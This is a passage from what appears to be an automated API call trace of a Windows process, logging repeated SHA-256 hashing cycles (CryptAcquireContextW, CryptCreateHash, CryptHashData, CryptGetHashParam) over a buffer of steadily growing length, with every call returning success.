pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acccf0, pdwDataLen=0xce12c) returned 1 [0189.593] CryptDestroyHash (hHash=0x3396f350) returned 1 [0189.593] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0189.593] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338225d0) returned 1 [0189.594] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.594] CryptHashData (hHash=0x3396ee10, pbData=0x32348160, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0189.594] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.594] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acdbc0 [0189.594] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x2, pbData=0x32acdbc0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acdbc0, pdwDataLen=0xce12c) returned 1 [0189.594] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0189.594] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.594] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338228d0) returned 1 [0189.595] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.595] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0189.595] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.595] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd920 [0189.595] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x2, pbData=0x32acd920, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd920, pdwDataLen=0xce12c) returned 1 [0189.595] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.595] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0189.595] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338229d0) returned 1 [0189.596] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.596] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0189.596] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.596] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace1c0 [0189.596] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x2, pbData=0x32ace1c0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32ace1c0, pdwDataLen=0xce12c) returned 1 [0189.596] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0189.596] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0189.596] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822fd0) returned 1 [0189.599] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.599] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0189.599] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.599] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace340 [0189.599] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x2, pbData=0x32ace340, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32ace340, pdwDataLen=0xce12c) returned 1 [0189.599] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.599] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0189.599] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822dd0) returned 1 [0189.599] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.599] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0189.599] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.599] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd950 [0189.600] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x2, pbData=0x32acd950, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd950, pdwDataLen=0xce12c) returned 1 [0189.600] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0189.600] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0189.600] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338237d0) returned 1 [0189.600] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.600] CryptHashData (hHash=0x3396f350, pbData=0x32348160, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0189.600] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.600] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd980 [0189.600] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32acd980, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd980, pdwDataLen=0xce12c) returned 1 [0189.600] CryptDestroyHash (hHash=0x3396f350) returned 1 [0189.600] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0189.600] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338225d0) returned 1 [0189.601] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.601] CryptHashData (hHash=0x3396eb70, pbData=0x32348160, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0189.601] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.601] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace280 [0189.601] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x2, pbData=0x32ace280, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32ace280, pdwDataLen=0xce12c) returned 1 [0189.601] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0189.601] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.601] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822ad0) returned 1 [0189.602] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.602] CryptHashData (hHash=0x3396f120, pbData=0x32348160, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0189.602] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.602] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acde30 [0189.602] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x2, pbData=0x32acde30, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acde30, pdwDataLen=0xce12c) returned 1 [0189.602] CryptDestroyHash (hHash=0x3396f120) returned 1 [0189.602] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0189.602] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338239d0) returned 1 [0189.602] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.602] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0189.602] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.602] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace250 [0189.602] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32ace250, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32ace250, pdwDataLen=0xce12c) returned 1 [0189.602] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0189.602] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0189.603] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338221d0) returned 1 [0189.603] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.603] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0189.603] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.603] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acdf20 [0189.603] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x2, pbData=0x32acdf20, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acdf20, pdwDataLen=0xce12c) returned 1 [0189.603] CryptDestroyHash (hHash=0x3396f580) returned 1 [0189.603] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0189.603] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822cd0) returned 1 [0189.604] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.604] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0189.604] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.604] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd9b0 [0189.604] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x2, pbData=0x32acd9b0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd9b0, pdwDataLen=0xce12c) returned 1 [0189.604] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.604] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0189.604] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822bd0) returned 1 [0189.605] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.605] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0189.605] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.605] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acda10 [0189.605] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x2, pbData=0x32acda10, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acda10, pdwDataLen=0xce12c) returned 1 [0189.605] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0189.605] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0189.605] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33821fd0) returned 1 [0189.605] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.605] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0189.605] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.605] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace2b0 [0189.605] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x2, pbData=0x32ace2b0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32ace2b0, pdwDataLen=0xce12c) returned 1 [0189.605] CryptDestroyHash (hHash=0x3396f580) returned 1 [0189.605] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0189.605] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338220d0) returned 1 [0189.606] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.606] CryptHashData (hHash=0x3396f350, pbData=0x32348160, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0189.606] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.606] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acdf50 [0189.606] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32acdf50, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acdf50, pdwDataLen=0xce12c) returned 1 [0189.606] CryptDestroyHash (hHash=0x3396f350) returned 1 [0189.606] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0189.606] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338229d0) returned 1 [0189.607] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.607] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0189.607] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.607] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd890 [0189.607] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32acd890, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd890, pdwDataLen=0xce12c) returned 1 [0189.607] CryptDestroyHash (hHash=0x3396f430) returned 1 [0189.607] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0189.607] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33821ed0) returned 1 [0189.607] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.607] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0189.608] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.608] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acdd40 [0189.608] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32acdd40, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acdd40, pdwDataLen=0xce12c) returned 1 [0189.608] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0189.608] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0189.608] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338226d0) returned 1 [0189.608] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.608] CryptHashData (hHash=0x3396f350, pbData=0x32348160, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0189.608] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.608] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd7a0 [0189.608] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32acd7a0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd7a0, pdwDataLen=0xce12c) returned 1 [0189.608] CryptDestroyHash (hHash=0x3396f350) returned 1 [0189.608] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0189.608] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338235d0) returned 1 [0189.609] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.609] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0189.609] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.609] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace070 [0189.609] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32ace070, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32ace070, pdwDataLen=0xce12c) returned 1 [0189.609] CryptDestroyHash (hHash=0x3396f430) returned 1 [0189.609] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0189.609] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338220d0) returned 1 [0189.610] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.610] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0189.610] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.610] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acdbf0 [0189.610] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x2, pbData=0x32acdbf0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acdbf0, pdwDataLen=0xce12c) returned 1 [0189.610] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.610] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0189.610] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822cd0) returned 1 [0189.610] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.610] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0189.610] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.610] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace0a0 [0189.610] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x2, pbData=0x32ace0a0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32ace0a0, pdwDataLen=0xce12c) returned 1 [0189.610] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0189.610] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0189.611] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338225d0) returned 1 [0189.611] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.611] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0189.611] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.611] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd9e0 [0189.611] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32acd9e0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd9e0, pdwDataLen=0xce12c) returned 1 [0189.611] CryptDestroyHash (hHash=0x3396f430) returned 1 [0189.611] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.611] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338231d0) returned 1 [0189.612] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.612] CryptHashData (hHash=0x3396ea90, pbData=0x32348160, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0189.612] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.612] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd7d0 [0189.612] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x2, pbData=0x32acd7d0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd7d0, pdwDataLen=0xce12c) returned 1 [0189.612] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0189.612] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0189.612] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338222d0) returned 1 [0189.615] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.615] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0189.615] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.615] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace190 [0189.615] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x2, pbData=0x32ace190, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32ace190, pdwDataLen=0xce12c) returned 1 [0189.615] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.615] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0189.615] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33821ed0) returned 1 [0189.615] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.615] CryptHashData (hHash=0x3396f190, pbData=0x32348160, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0189.615] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.615] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acdc20 [0189.615] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x2, pbData=0x32acdc20, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acdc20, pdwDataLen=0xce12c) returned 1 [0189.615] CryptDestroyHash (hHash=0x3396f190) returned 1 [0189.615] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0189.616] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338237d0) returned 1 [0189.616] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.616] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0189.616] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.616] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acdc80 [0189.616] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32acdc80, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acdc80, pdwDataLen=0xce12c) returned 1 [0189.616] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0189.616] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0189.616] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822bd0) returned 1 [0189.617] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.617] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0189.617] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 